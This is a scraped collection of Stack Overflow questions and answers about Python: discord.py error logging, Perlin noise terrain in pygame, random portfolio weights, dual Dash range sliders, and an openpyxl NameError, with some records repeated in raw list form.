runtime error example print("Command") async def setup(client): await client.add_cog(Test(client)) Command that I run in terminal to start the bot. python bot.py When I type !command in the discord channel, there is no error message showing in the terminal, but there is no "Command" printed out so I'm sure the code stopped at the line I called test_error_message() I expected that it should show error message normally, but I cannot find useful reference to make it work :( There is one reason I need to use asyncio, I have a task loop to run in the bot, like the code below. from discord.ext import tasks @tasks.loop(seconds=10) async def avatar_update(): # code here async def main(): async with bot: avatar_update.start() await load_extensions() await bot.start(token) I would happy to know if there are some great practice to handle error in this situation. Thanks!
[ "Client.start() doesn't configure logging, so if you want to use that then you have to do it yourself (there's setup_logging to add a basic config). run() configures logging for you.\nFor more info, read the docs. https://discordpy.readthedocs.io/en/stable/logging.html?highlight=logging\n" ]
[ 0 ]
[]
[]
[ "discord", "discord.py", "python" ]
stackoverflow_0074591873_discord_discord.py_python.txt
Q: How to generate Perlin noise in pygame? I am trying to make a survival game and I have a problem with Perlin noise. My program gives me this: But I want something like islands or rivers. Here's my code: #SetUp# import pygame, sys, random pygame.init() win = pygame.display.set_mode((800, 600)) pygame.display.set_caption('Isom') x = 0 y = 0 s = 0 tilel = list() random.seed(5843) MAP = [random.randint(0, 1) for _ in range(192)] #Tiles# class tile(): grass = pygame.image.load('Sprites/Images/Grass.png') water = pygame.image.load('Sprites/Images/Water.png') #Loop# while True: for key in pygame.event.get(): if key.type == pygame.QUIT: pygame.quit() sys.exit() #World# for a in range(12): for b in range(16): if MAP[s] == 0: win.blit((tile.grass), (x, y)) elif MAP[s] == 1: win.blit((tile.water), (x, y)) x += 50 s += 1 x = 0 y += 50 x = 0 y = 0 s = 0 #Update# pygame.display.update() A: Image of randomly generated terrain. Code for Perlin noise in pygame: from perlin_noise import PerlinNoise import random import pygame pygame.init() noise = PerlinNoise(octaves=6, seed=random.randint(0, 100000)) xpix, ypix = 500, 500 pic = [[noise([i/xpix, j/ypix]) for j in range(xpix)] for i in range(ypix)] screen = pygame.display.set_mode((500, 500), pygame.RESIZABLE) while True: for event in pygame.event.get(): if event.type == pygame.QUIT: pygame.quit() run = False for i, row in enumerate(pic): for j, column in enumerate(row): if column>=0.6: pygame.draw.rect(screen, (250, 250, 250), pygame.Rect(j, i, 1, 1)) elif column>=0.2: pygame.draw.rect(screen, (80, 80, 80), pygame.Rect(j, i, 1, 1)) elif column>=0.09: pygame.draw.rect(screen, (30, 90, 30), pygame.Rect(j, i, 1, 1)) elif column >=0.009: pygame.draw.rect(screen, (10, 100, 10), pygame.Rect(j, i, 1, 1)) elif column >=0.002: pygame.draw.rect(screen, (100, 150, 0), pygame.Rect(j, i, 1, 1)) elif column >=-0.02: pygame.draw.rect(screen, (40, 200, 0), pygame.Rect(j, i, 1, 1)) elif column >=-0.06: pygame.draw.rect(screen, (30, 190, 0), pygame.Rect(j, i, 1, 1)) elif column >=-0.1: pygame.draw.rect(screen, (10, 210, 0), pygame.Rect(j, i, 1, 1)) elif column >=-0.8: pygame.draw.rect(screen, (0, 0, 200), pygame.Rect(j, i, 1, 1)) #------------ #run the game class pygame.display.update() pygame.quit() quit() A: I recommend installing the noise package. Then use noise.pnoise1(x) for 1 dimensional Perlin noise, noise.pnoise2(x, y) for 2 dimensional Perlin noise, and noise.pnoise3(x, y, z) for 3 dimensional Perlin noise. A: First, the critical thinking: Perlin is a popular term but the actual "Perlin" noise algorithm is old and visibly square-aligned. Better, as a general rule, to use a Simplex-type noise. I suggest PyFastNoiseLite: https://github.com/tizilogic/PyFastNoiseLite Follow the install instructions, then mirror the C++ example in the FastNoiseLite documentation here: https://github.com/Auburn/FastNoiseLite/tree/master/Cpp Be sure to note its internal frequency multiplication, which you can change with SetFrequency(f) You can also use the Python noise library for Simplex-type noise, with snoise2(x, y), though if you wish to use snoise3(x, y, z) I would first consider the info here: https://www.reddit.com/r/proceduralgeneration/comments/qr6snt/countdown_timer_simplex_patent_expiration/
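A minimal sketch of the noise-package route from the second answer, adapted to the question's 16x12 tile grid (hedged: the scale, octaves, base and threshold are arbitrary choices; requires pip install noise):

    import noise  # pip install noise

    GRID_W, GRID_H, SCALE = 16, 12, 0.15
    MAP = []
    for gy in range(GRID_H):
        for gx in range(GRID_W):
            # sample at non-integer coordinates so pnoise2 varies smoothly
            v = noise.pnoise2(gx * SCALE, gy * SCALE, octaves=4, base=7)
            MAP.append(0 if v > 0 else 1)  # 0 = grass, 1 = water, as in the question

The question's blit loop can render this MAP unchanged; neighbouring tiles now correlate, producing island-like blobs instead of random speckle.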
How to generate Perlin noise in pygame?
I am trying to make a survival game and I have a problem with perlin noise. My program gives me this: But I want something like islands or rivers. Here's my code: #SetUp# import pygame, sys, random pygame.init() win = pygame.display.set_mode((800, 600)) pygame.display.set_caption('Isom') x = 0 y = 0 s = 0 tilel = list() random.seed(5843) MAP = [random.randint(0, 1) for _ in range(192)] #Tiles# class tile(): grass = pygame.image.load('Sprites/Images/Grass.png') water = pygame.image.load('Sprites/Images/Water.png') #Loop# while True: for key in pygame.event.get(): if key.type == pygame.QUIT: pygame.quit() sys.exit() #World# for a in range(12): for b in range(16): if MAP[s] == 0: win.blit((tile.grass), (x, y)) elif MAP[s] == 1: win.blit((tile.water), (x, y)) x += 50 s += 1 x = 0 y += 50 x = 0 y = 0 s = 0 #Update# pygame.display.update()
[ "image of randomly genrated terrain\ncode for perlin noise in pygame:\n from PIL import Image\n import numpy as np\n from perlin_noise import PerlinNoise\n import random\n import pygame\n pygame.init()\n\n noise = PerlinNoise(octaves=6, seed=random.randint(0, 100000))\n xpix, ypix = 500, 500\n pic = [[noise([i/xpix, j/ypix]) for j in range(xpix)] for i in range(ypix)]\n\n\n\n screen = pygame.display.set_mode ((500, 500), pygame.RESIZABLE)\n while True:\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n pygame.quit()\n run = False\n for i, row in enumerate(pic):\n for j, column in enumerate(row):\n if column>=0.6:\n pygame.draw.rect(screen, (250, 250, 250), pygame.Rect(j, i, 1, 1))\n elif column>=0.2:\n pygame.draw.rect(screen, (80, 80, 80), pygame.Rect(j, i, 1, 1)) \n elif column>=0.09:\n pygame.draw.rect(screen, (30, 90, 30), pygame.Rect(j, i, 1, 1))\n elif column >=0.009:\n pygame.draw.rect(screen, (10, 100, 10), pygame.Rect(j, i, 1, 1))\n elif column >=0.002:\n pygame.draw.rect(screen, (100, 150, 0), pygame.Rect(j, i, 1, 1))\n elif column >=-0.06:\n pygame.draw.rect(screen, (30, 190, 0), pygame.Rect(j, i, 1, 1))\n elif column >=-0.02:\n pygame.draw.rect(screen, (40, 200, 0), pygame.Rect(j, i, 1, 1))\n elif column >=-0.1:\n pygame.draw.rect(screen, (10, 210, 0), pygame.Rect(j, i, 1, 1))\n elif column >=-0.8:\n pygame.draw.rect(screen, (0, 0, 200), pygame.Rect(j, i, 1, 1))\n\n #------------\n #run the game class\n\n pygame.display.update()\n pygame.quit()\n quit()\n\n\n \n\n", "I recommend installing the noise package. Then use noise.pnoise1(x) for 1 dimensional Perlin noise, noise.pnoise2(x, y) for 2 dimensional Perlin noise, and noise.pnoise3(x, y, z) for 3 dimensional Perlin noise.\n", "First, the critical thinking: Perlin is a popular term but the actual \"Perlin\" noise algorithm is old and visibly square-aligned. Better, as a general rule, to use a Simplex-type noise.\nI suggest PyFastNoiseLite: https://github.com/tizilogic/PyFastNoiseLite Follow the install instructions, then mirror the C++ example in the FastNoiseLite documentation here: https://github.com/Auburn/FastNoiseLite/tree/master/Cpp Be sure to note its internal frequency multiplication, which you can change with SetFrequency(f)\nYou can also use the Python noise library for Simplex-type noise, with noise snoise2(x, y) though if you wish to use snoise3(x, y, z) I would first consider the info here: https://www.reddit.com/r/proceduralgeneration/comments/qr6snt/countdown_timer_simplex_patent_expiration/\n" ]
[ 1, 0, 0 ]
[]
[]
[ "perlin_noise", "pygame", "python" ]
stackoverflow_0070084741_perlin_noise_pygame_python.txt
Q: What is the most efficient way to generate a list of random numbers all within a range that have a fixed sum so that their boundaries are approached? I am trying to generate a list of 12 random weights for a stock portfolio in order to determine how the portfolio would have performed in the past given different weights assigned to each stock. The sum of the weights must of course be 1 and there is an additional restriction: each stock must have a weight between 1/24 and 1/4. Although I am able to generate random numbers such that they all fall within the interval by using random.uniform(), as well as guarantee their sum is 1 by dividing each weighting by the sum of the weightings, I'm finding that a) each subsequent array of weightings is very similar. I am rarely getting values for weightings that are near the upper boundary of 1/4 b) random.seed() does not seem to be working properly, whether I put it in the rand_weight() function or at the beginning of the for loop. I'm confused as to why because I thought that generating a random seed value would make my array of weights unique for each iteration. Currently, it's cyclical, with a period of 3. The following is my code: # boundaries on weightings n = 12 min_weight = (1/(2*n)) max_weight = 25 / 100 def rand_weight(e): random.seed() return e + np.random.uniform(min_weight, max_weight) for i in range(100): weights = np.empty(12) while not (np.all(weights > min_weight) and np.all(weights < max_weight)): weights = np.array(list(map(rand_weight, weights))) weights /= np.sum(weights) I have already tried scattering the weights by changing the min_weight and max_weight inside the for loop so that rand_weight generates newer values, but this makes the runtime really slow because the "not" condition in the while loop takes longer to evaluate to false (since the probability of all the numbers being in the range decreases). A: The following works. Particularly confusing to me is that np.empty(12) seemed to always return the same array. So once it had been initialized, it stayed the same. This seems to produce numbers above 0.22 reasonably often. import numpy as np from random import random, seed # boundaries on weightings n = 12 min_weight = (1/(2*n)) max_weight = 25 / 100 seed(666) for i in range(100): weights = np.zeros(n) while not (np.all(weights > min_weight) and np.all(weights < max_weight)): weights = np.array([random() for _ in range(n)]) weights /= np.sum(weights) - min_weight * n weights += min_weight print(weights) A: Let's start with simple facts first. If you want numbers to be in the range [0.042...0.25] and 12 iid numbers in total summed to one, then for the mean value: Sum(Xi) = 1, so E[Sum(Xi)] = Sum(E[Xi]) = N·E[Xi] = 1, giving E[Xi] = 1/N = 1/12 ≈ 0.083. One corollary is that it would be hard to get numbers close to the upper range boundary. And instead of sampling arbitrary values and then normalizing to make the sum 1, it is better to use a known distribution where the sum of values is 1 to begin with. So let's use the Dirichlet distribution and sample points uniformly in the simplex, which means the alpha (concentration) vector is all ones. import numpy as np N = 12 s = np.random.dirichlet(N*[1.0], 1) print(np.sum(s)) Some values would be larger (or smaller) than the bounds, and you could reject them: def sampleWeights(alpha, lo, hi): while True: s = np.random.dirichlet(alpha, 1)[0] if np.any(s > hi): continue # reject if np.any(s < lo): continue # reject return s # accept and call it like this N=12 alpha = N*[1.0] q = sampleWeights(alpha, 1./24., 1./4.) If you check it, a lot of rejections happen at the low bound rather than the high bound. The beauty of using the known Dirichlet distribution is that you can "concentrate" sampled values around the mean, e.g. alpha = N*[10.0] q = sampleWeights(alpha, 1./24., 1./4.) will produce the same iid RVs with a mean of 1/12 but a much smaller standard deviation, a lot more concentrated around the mean. And if you want non-identically distributed RVs, use different alphas: alpha = [1.,2.,3.,4.,5.,6.,6.,5.,4.,3.,2.,1.] q = sampleWeights(alpha, 1./24., 1./4.) then some of the RVs would be close to the upper boundary and some close to the lower boundary. There are lots of advantages to using a known distribution.
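A quick check of the rejection sampler (a sketch; assumes sampleWeights from the answer above is in scope):

    import numpy as np

    N = 12
    q = sampleWeights(N * [1.0], 1./24., 1./4.)
    assert abs(q.sum() - 1.0) < 1e-9  # Dirichlet draws sum to 1
    assert q.min() > 1/24 and q.max() < 1/4  # bounds enforced by rejection
    print(q.round(3))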
What is the most efficient way to generate a list of random numbers all within a range that have a fixed sum so that their boundaries are approached?
I am trying to generate a list of 12 random weights for a stock portfolio in order to determine how the portfolio would have performed in the past given different weights assigned to each stock. The sum of the weights must of course be 1 and there is an additional restriction: each stock must have a weight between 1/24 and 1/4. Although I am able to generate random numbers such that they all fall within the interval by using random.uniform(), as well as guarantee their sum is 1 by dividing each weighting by the sum of the weightings, I'm finding that a) each subsequent array of weightings is very similar. I am rarely getting values for weightings that are near the upper boundary of 1/4 b) random.seed() does not seem to be working properly, whether I put it in the randweight() function or at the beginning of the for loop. I'm confused as to why because I thought that generating a random seed value would make my array of weights unique for each iteration. Currently, it's cyclical, with a period of 3. The following is my code: # boundaries on weightings n = 12 min_weight = (1/(2*n)) max_weight = 25 / 100 def rand_weight(e): random.seed() return e + np.random.uniform(min_weight, max_weight) for i in range(100): weights = np.empty(12) while not (np.all(weights > min_weight) and np.all(weights < max_weight)): weights = np.array(list(map(rand_weight, weights))) weights /= np.sum(weights) I have already tried scattering the weights by changing the min_weight and max_weight inside the for loop so that rand_weight generates newer values, but this makes the runtime really slow because the "not" condition in the while loop takes longer to evaluate to false (since the probability of all the numbers being in the range decreases).
[ "The following works. Particularly confusing to me is that np.empty(12) seemed to always return the same array. So once it had been initialized, it stayed the same.\nThis seems to produce numbers above 0.22 reasonably often.\nimport numpy as np\nfrom random import random, seed\n\n# boundaries on weightings\nn = 12\nmin_weight = (1/(2*n))\nmax_weight = 25 / 100\n\nseed(666)\nfor i in range(100):\n weights = np.zeros(n)\n while not (np.all(weights > min_weight) and np.all(weights < max_weight)):\n weights = np.array([random() for _ in range(n)])\n weights /= np.sum(weights) - min_weight * n\n weights += min_weight\n print(weights)\n\n", "Lets start with simple facts first. If you want numbers to be in the range [0.042...0.25] and 12 iid numbers in total summed to one, then for mean value\nSum(Xi)=1\nE[Sum(Xi)]=Sum(E[Xi])=N E[Xi] = 1\nE[Xi]=1/N = 1/12 = 0.083\nOne corollary is that it would be hard to get numbers close to upper range boundary.\nAnd instead doing things like sampling whatever and then normalizing to get sum to 1, better to use known distribution where sum of values is 1 to begin with.\nSo lets use Dirichlet distribution, and sample points uniformly in simplex, which means alpha (concentration) vector is all ones.\nimport numpy as np\n\nN = 12\ns = np.random.dirichlet(N*[1.0], 1)\nprint(np.sum(s))\n\nSome value would be larger (or smaller), and you could reject them\ndef sampleWeights(alpha, lo, hi):\n while True:\n s = np.random.dirichlet(alpha, 1)[0]\n if np.any(s > hi):\n continue # reject\n if np.any(s < lo):\n continue # reject\n return s # accept\n\nand call it like this\nN=12\nalpha = N*[1.0]\nq = sampleWeights(alpha, 1./24., 1./4.)\n\nif you could check it, a lot of rejections happens at low bound, rather then high bound.\nBEauty of using known Dirichlet distribution is that you could \"concentrate\" sampled values around mean, e.g.\nalpha = N*[10.0]\nq = sampleWeights(alpha, 1./24., 1./4.)\n\nwill produce same iid with mean of 1/12 but a lot smaller std.deviation, RV a lot more concentrated around mean\nAnd if you want non-identically distributed RVs, use different alphas\nalpha = [1.,2.,3.,4.,5.,6.,6.,5.,4.,3.,2.,1.]\nq = sampleWeights(alpha, 1./24., 1./4.)\n\nthen some of RVs would be close to upper boundary, and some close to lower boundary. Lots of advantages to use known distribution\n" ]
[ 0, 0 ]
[]
[]
[ "algorithm", "numpy", "python", "random", "random_seed" ]
stackoverflow_0074573355_algorithm_numpy_python_random_random_seed.txt
Q: Dash Choosing an ID and then Make Plot with Multiple Sliders I have a dataset which is similar to the one below. Please note that there are multiple values for a single ID. import pandas as pd import numpy as np import random df = pd.DataFrame({'DATE_TIME':pd.date_range('2022-11-01', '2022-11-05 23:00:00',freq='20min'), 'SBP':[random.uniform(110, 160) for n in range(358)], 'DBP':[random.uniform(60, 100) for n in range(358)], 'ID':[random.randrange(1, 3) for n in range(358)], 'TIMEINTERVAL':[random.randrange(1, 200) for n in range(358)]}) df['VISIT'] = df['DATE_TIME'].dt.day df['MODE'] = np.select([df['VISIT']==1, df['VISIT'].isin([2,3])], ['CKD', 'Dialysis'], 'Late TPL') df['TIME'] = df['DATE_TIME'].dt.time df['TIME'] = df['TIME'].astype('str') def to_day_period(s): bins = ['0', '06:00:00', '13:00:00', '18:00:00', '23:00:00', '24:00:00'] labels = ['Night', 'Morning', 'Afternoon', 'Evening', 'Night'] return pd.cut( pd.to_timedelta(s), bins=list(map(pd.Timedelta, bins)), labels=labels, right=False, ordered=False ) df['TIME_OF_DAY'] = to_day_period(df['TIME']) I would like to use Dash so that I can first choose the ID and then make a plot of that chosen ID. Besides, I made a slider to choose the time interval between measurements in terms of minutes. This slider should work for Morning and Night values separately. So, I have already implemented a slider which works for all day and night times. I would like to have two sliders, one for Morning values from 06:00 until 17:59, and the other, called Night, from 18:00 until 05:59. from dash import Dash, html, dcc, Input, Output import pandas as pd import os import plotly.express as px # FUNCTION TO CHOOSE A SINGLE PATIENT def choose_patient(dataframe_name, id_number): return dataframe_name[dataframe_name['ID']==id_number] # FUNCTION TO CHOOSE A SINGLE PATIENT WITH A SINGLE VISIT def choose_patient_visit(dataframe_name, id_number,visit_number): return dataframe_name[(dataframe_name['ID']==id_number) & (dataframe_name['VISIT']==visit_number)] # READING THE DATA df = pd.read_csv(df,sep=',',parse_dates=['DATE_TIME','DATE'], infer_datetime_format=True) # ---------------------------------------------------- dash example ---------------------------------------------------- app = Dash(__name__) app.layout = html.Div([ html.H4('Interactive Scatter Plot'), dcc.Graph(id="scatter-plot",style={'width': '130vh', 'height': '80vh'}), html.P("Filter by time interval:"), dcc.Dropdown(df.ID.unique(), id='pandas-dropdown-1'), # for choosing ID, dcc.RangeSlider( id='range-slider', min=0, max=600, step=10, marks={0: '0', 50: '50', 100: '100', 150: '150', 200: '200', 250: '250', 300: '300', 350: '350', 400: '400', 450: '450', 500: '500', 550: '550', 600: '600'}, value=[0, 600] ), html.Div(id='dd-output-container') ]) @app.callback( Output("scatter-plot", "figure"), Input("pandas-dropdown-1", "value"), Input("range-slider", "value"), prevent_initial_call=True) def update_lineplot(value, slider_range): low, high = slider_range df1 = df.query("ID == @value & TIMEINTERVAL >= @low & TIMEINTERVAL < @high").copy() if df1.shape[0] != 0: fig = px.line(df1, x="DATE_TIME", y=["SBP", "DBP"], hover_data=['TIMEINTERVAL'], facet_col='VISIT', facet_col_wrap=2, symbol='MODE', facet_row_spacing=0.1, facet_col_spacing=0.09) fig.update_xaxes(matches=None, showticklabels=True) return fig else: return dash.no_update app.run_server(debug=True, use_reloader=False) How can I implement such two sliders? One slider should work for Night values of the TIME_OF_DAY column and another one for Morning values of the TIME_OF_DAY column. I looked at the Dash website, but there is no such tool available. A: The solution below only requires very minor modifications to your example code. It essentially filters the original dataframe twice (once for TIME_OF_DAY='Night', and once for TIME_OF_DAY='Morning') and concatenates them before plotting. I've also modified the bins in the to_day_period function to only produce two labels that match the request in the text ("Morning values from 06:00 until 17:59, and [...] Night from 18 until 05:59."), but the Dash code can similarly be used for more categories. bins = ['0', '06:00:00', '18:00:00', '24:00:00'] labels = ['Night', 'Morning', 'Night'] Dash code app = Dash(__name__) app.layout = html.Div([ html.H4('Interactive Scatter Plot with ABPM dataset'), html.P("Select ID:"), dcc.Dropdown(df.ID.unique(), id='pandas-dropdown-1'), # for choosing ID, html.P("Filter by time interval during nighttime (18:00-6:00):"), dcc.RangeSlider( id='range-slider-night', min=0, max=600, step=10, marks={0: '0', 50: '50', 100: '100', 150: '150', 200: '200', 250: '250', 300: '300', 350: '350', 400: '400', 450: '450', 500: '500', 550: '550', 600: '600'}, value=[0, 600] ), html.P("Filter by time interval during daytime (6:00-18:00):"), dcc.RangeSlider( id='range-slider-morning', min=0, max=600, step=10, marks={0: '0', 50: '50', 100: '100', 150: '150', 200: '200', 250: '250', 300: '300', 350: '350', 400: '400', 450: '450', 500: '500', 550: '550', 600: '600'}, value=[0, 600] ), dcc.Graph(id="scatter-plot", style={'width': '130vh', 'height': '80vh'}), html.Div(id='dd-output-container') ]) @app.callback( Output("scatter-plot", "figure"), Input("pandas-dropdown-1", "value"), Input("range-slider-night", "value"), Input("range-slider-morning", "value"), prevent_initial_call=True) def update_lineplot(value, slider_range_night, slider_range_morning): low_night, high_night = slider_range_night low_morning, high_morning = slider_range_morning df_night = df.query("ID == @value & TIME_OF_DAY == 'Night' & TIMEINTERVAL >= @low_night & TIMEINTERVAL < @high_night").copy() df_morning = df.query("ID == @value & TIME_OF_DAY == 'Morning' & TIMEINTERVAL >= @low_morning & TIMEINTERVAL < @high_morning").copy() df1 = pd.concat([df_night, df_morning], axis=0).sort_values(['TIME']) if df1.shape[0] != 0: fig = px.line(df1, x="DATE_TIME", y=["SBP", "DBP"], hover_data=['TIMEINTERVAL'], facet_col='VISIT', facet_col_wrap=2, symbol='MODE', facet_row_spacing=0.1, facet_col_spacing=0.09) fig.update_xaxes(matches=None, showticklabels=True) return fig else: return no_update app.run_server(debug=True, use_reloader=False) Application In the screenshot below, all the "Morning"/"Daytime" observations have been filtered for TIMEINTERVAL, while the "Night" observations remain unaffected:
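A tiny check of the two-label binning the answer relies on (a sketch):

    import pandas as pd

    def to_day_period(s):
        bins = ['0', '06:00:00', '18:00:00', '24:00:00']
        labels = ['Night', 'Morning', 'Night']
        return pd.cut(pd.to_timedelta(s), bins=list(map(pd.Timedelta, bins)),
                      labels=labels, right=False, ordered=False)

    print(to_day_period(pd.Series(['05:30:00', '09:00:00', '21:15:00'])).tolist())
    # ['Night', 'Morning', 'Night']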
Dash Choosing an ID and then Make Plot with Multiple Sliders
I have a dataset which is similar to below one. Please note that there are multiple values for a single ID. import pandas as pd import numpy as np import random df = pd.DataFrame({'DATE_TIME':pd.date_range('2022-11-01', '2022-11-05 23:00:00',freq='20min'), 'SBP':[random.uniform(110, 160) for n in range(358)], 'DBP':[random.uniform(60, 100) for n in range(358)], 'ID':[random.randrange(1, 3) for n in range(358)], 'TIMEINTERVAL':[random.randrange(1, 200) for n in range(358)]}) df['VISIT'] = df['DATE_TIME'].dt.day df['MODE'] = np.select([df['VISIT']==1, df['VISIT'].isin([2,3])], ['CKD', 'Dialysis'], 'Late TPL') df['TIME'] = df['DATE_TIME'].dt.time df['TIME'] = df['TIME'].astype('str') def to_day_period(s): bins = ['0', '06:00:00', '13:00:00', '18:00:00', '23:00:00', '24:00:00'] labels = ['Night', 'Morning', 'Afternoon', 'Evening', 'Night'] return pd.cut( pd.to_timedelta(s), bins=list(map(pd.Timedelta, bins)), labels=labels, right=False, ordered=False ) df['TIME_OF_DAY'] = to_day_period(df['TIME']) I would like to use Dash so that I can firstly choose the ID, and then make a plot of that chosen ID. Besides, I made a slider to choose the time interval between measurements in terms of minutes. This slider should work for Morning and Night values separately. So, I have already implemented a slider which works for all day and night times. I would like to have two sliders, one for Morning values from 06:00 until 17:59, and other one called Night from 18 until 05:59. from dash import Dash, html, dcc, Input, Output import pandas as pd import os import plotly.express as px # FUNCTION TO CHOOSE A SINGLE PATIENT def choose_patient(dataframe_name, id_number): return dataframe_name[dataframe_name['ID']==id_number] # FUNCTION TO CHOOSE A SINGLE PATIENT WITH A SINGLE VISIT def choose_patient_visit(dataframe_name, id_number,visit_number): return dataframe_name[(dataframe_name['ID']==id_number) & (dataframe_name['VISIT']==visit_number)] # READING THE DATA df = pd.read_csv(df,sep=',',parse_dates=['DATE_TIME','DATE'], infer_datetime_format=True) # ---------------------------------------------------- dash example ---------------------------------------------------- app = Dash(__name__) app.layout = html.Div([ html.H4('Interactive Scatter Plot'), dcc.Graph(id="scatter-plot",style={'width': '130vh', 'height': '80vh'}), html.P("Filter by time interval:"), dcc.Dropdown(df.ID.unique(), id='pandas-dropdown-1'), # for choosing ID, dcc.RangeSlider( id='range-slider', min=0, max=600, step=10, marks={0: '0', 50: '50', 100: '100', 150: '150', 200: '200', 250: '250', 300: '300', 350: '350', 400: '400', 450: '450', 500: '500', 550: '550', 600: '600'}, value=[0, 600] ), html.Div(id='dd-output-container') ]) @app.callback( Output("scatter-plot", "figure"), Input("pandas-dropdown-1", "value"), Input("range-slider", "value"), prevent_initial_call=True) def update_lineplot(value, slider_range): low, high = slider_range df1 = df.query("ID == @value & TIMEINTERVAL >= @low & TIMEINTERVAL < @high").copy() if df1.shape[0] != 0: fig = px.line(df1, x="DATE_TIME", y=["SBP", "DBP"], hover_data=['TIMEINTERVAL'], facet_col='VISIT', facet_col_wrap=2, symbol='MODE', facet_row_spacing=0.1, facet_col_spacing=0.09) fig.update_xaxes(matches=None, showticklabels=True) return fig else: return dash.no_update app.run_server(debug=True, use_reloader=False) How can I implement such two sliders? One slider should work for Night values of TIME_OF_DAY column and another one for Morning values of TIME_OF_DAY column. 
I looked at the Dash website, but there is no such tool available.
[ "The solution below only requires vey minor modifications to your example code. It essentially filters the original dataframe twice (once for TIME_OF_DAY='Night', and once for TIME_OF_DAY='Morning') and concatenates them before plotting.\nI've also modified the bins in the to_day_period function to only produce two labels that match the request in the text (\"Morning values from 06:00 until 17:59, and [...] Night from 18 until 05:59.\"), but the dash code can similarily be used for more categories.\n bins = ['0', '06:00:00', '18:00:00', '24:00:00']\n labels = ['Night', 'Morning', 'Night']\n\nDash code\napp = Dash(__name__)\n\napp.layout = html.Div([\n html.H4('Interactive Scatter Plot with ABPM dataset'),\n html.P(\"Select ID:\"),\n dcc.Dropdown(df.ID.unique(), id='pandas-dropdown-1'), # for choosing ID,\n html.P(\"Filter by time interval during nighttime (18:00-6:00):\"),\n dcc.RangeSlider(\n id='range-slider-night',\n min=0, max=600, step=10,\n marks={0: '0', 50: '50', 100: '100', 150: '150', 200: '200', 250: '250', 300: '300', 350: '350', 400: '400',\n 450: '450', 500: '500', 550: '550', 600: '600'},\n value=[0, 600]\n ),\n html.P(\"Filter by time interval during daytime (6:00-18:00):\"),\n dcc.RangeSlider(\n id='range-slider-morning',\n min=0, max=600, step=10,\n marks={0: '0', 50: '50', 100: '100', 150: '150', 200: '200', 250: '250', 300: '300', 350: '350', 400: '400',\n 450: '450', 500: '500', 550: '550', 600: '600'},\n value=[0, 600]\n ),\n dcc.Graph(id=\"scatter-plot\", style={'width': '130vh', 'height': '80vh'}),\n html.Div(id='dd-output-container')\n])\n\n\n@app.callback(\n Output(\"scatter-plot\", \"figure\"),\n Input(\"pandas-dropdown-1\", \"value\"),\n Input(\"range-slider-night\", \"value\"),\n Input(\"range-slider-morning\", \"value\"),\n prevent_initial_call=True)\n\ndef update_lineplot(value, slider_range_night, slider_range_morning):\n low_night, high_night = slider_range_night\n low_morning, high_morning = slider_range_morning\n df_night = df.query(\"ID == @value & TIME_OF_DAY == 'Night' & TIMEINTERVAL >= @low_night & TIMEINTERVAL < @high_night\").copy()\n df_morning = df.query(\"ID == @value & TIME_OF_DAY == 'Morning' & TIMEINTERVAL >= @low_morning & TIMEINTERVAL < @high_morning\").copy()\n df1 = pd.concat([df_night, df_morning], axis=0).sort_values(['TIME'])\n\n if df1.shape[0] != 0:\n fig = px.line(df1, x=\"DATE_TIME\", y=[\"SBP\", \"DBP\"],\n hover_data=['TIMEINTERVAL'], facet_col='VISIT',\n facet_col_wrap=2,\n symbol='MODE',\n facet_row_spacing=0.1,\n facet_col_spacing=0.09)\n\n fig.update_xaxes(matches=None, showticklabels=True)\n\n return fig\n else:\n return no_update\n\napp.run_server(debug=True, use_reloader=False)\n\nApplication\nIn the screenshot below, all the \"Morning\"/\"Daytime\" observations have been filtered for TIMEINTERVAL, while the \"Night\" observations remain unaffected:\n\n" ]
[ 1 ]
[]
[]
[ "plotly", "plotly_dash", "python" ]
stackoverflow_0074448717_plotly_plotly_dash_python.txt
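A small refactor that follows from the answer above: the two RangeSliders share identical parameters, so a helper function can build them and keep the layout free of the duplicated marks dicts. This is a minimal sketch assuming the same dcc import as the answer; the helper name make_interval_slider is hypothetical:

from dash import dcc

# Hypothetical helper: builds one of the identical range sliders used above.
def make_interval_slider(slider_id, lo=0, hi=600, step=10):
    # Tick marks every 50 units, matching the sliders in the answer.
    marks = {i: str(i) for i in range(lo, hi + 1, 50)}
    return dcc.RangeSlider(id=slider_id, min=lo, max=hi, step=step,
                           marks=marks, value=[lo, hi])

# Usage inside the layout:
# make_interval_slider('range-slider-night'), make_interval_slider('range-slider-morning')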
Q: Why do I get this "sheet" not found error? import openpyxl as rp ton1 = rp.load_workbook("transactions.xlsx") gol = ton1["Sheet1"] joi = sheet["a1"] print(joi.value) Following Mosh's course... stuck on this... need help A: The error NameError: name 'sheet' is not defined is legit. If you want to read from an Excel spreadsheet in python/openpyxl, you need to define it first and in your case, that is gol. You can try this : import openpyxl as rp ton1 = rp.load_workbook("transactions.xlsx") gol = ton1["Sheet1"] joi = gol["A1"] # instead of sheet["a1"] print(joi.value) Read more here about openpyxl.
Why do I get this "sheet" not found error?
import openpyxl as rp ton1 = rp.load_workbook("transactions.xlsx") gol = ton1["Sheet1"] joi = sheet["a1"] print(joi.value) Following Mosh's course... stuck on this... need help
[ "The error NameError: name 'sheet' is not defined is legit. If you want to read from an Excel spreadsheet in python/openpyxl, you need to define it first and in your case, that is gol.\nYou can try this :\nimport openpyxl as rp\n\nton1 = rp.load_workbook(\"transactions.xlsx\")\n\ngol = ton1[\"Sheet1\"]\n\njoi = gol[\"A1\"] # instead of sheet[\"a1\"]\n\nprint(joi.value)\n\nRead more here about openpyxl.\n" ]
[ 0 ]
[]
[]
[ "nameerror", "openpyxl", "python" ]
stackoverflow_0074592073_nameerror_openpyxl_python.txt
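For readers hitting the same NameError: the pattern generalizes — whatever name you bind the worksheet to is the name you index. A minimal sketch, assuming a workbook transactions.xlsx with a sheet named Sheet1, as in the question:

import openpyxl

wb = openpyxl.load_workbook("transactions.xlsx")
ws = wb["Sheet1"]          # bind the worksheet to a name...
print(ws["A1"].value)      # ...and index cells via that same name

# Iterating a whole column instead of a single cell:
for row in ws.iter_rows(min_col=1, max_col=1, values_only=True):
    print(row[0])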
